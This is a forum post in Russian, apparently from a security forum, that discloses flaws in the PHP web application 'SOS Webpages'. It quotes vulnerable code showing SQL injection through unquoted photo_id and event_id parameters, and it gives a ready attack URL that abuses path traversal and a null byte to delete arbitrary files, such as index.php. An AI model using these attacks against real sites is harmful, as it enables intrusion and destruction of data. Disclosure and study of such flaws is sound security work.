Показать сообщение отдельно

  #4  
Старый 09.09.2009, 16:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ElteRUS  
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_


SQL-injection

Уязвимый код:
photo.php
PHP код:
 . . .
 if (isset(
$_GET['photo_id'])) {
    
  
$photo_id mysql_real_escape_string($_GET['photo_id']);
  
$sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
  
$result=mysql_query($sql);  
 . . . 
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте

PHP код:
 . . .
elseif (isset(
$_GET['event_id'])) {
  
  
$event_id mysql_real_escape_string($_GET['event_id']); 
    . . .
    
$sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
  
$result=mysql_query($sql);
 . . . 
забавный код в файле admin_delete_image.php

PHP код:
/*    admin_delete_image.php will delete an image from the server */

Require "passcheck.php";
$image=$_GET["image"];
if (
file_exists("../uploads/$image")) {
    
unlink("../uploads/$image");
    }
header("Location: admin_view_images.php");
exit;
?> 
имея права админа можно удалить любые файлы!!который имеют соответсвующие права

admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php
 
Ответить с цитированием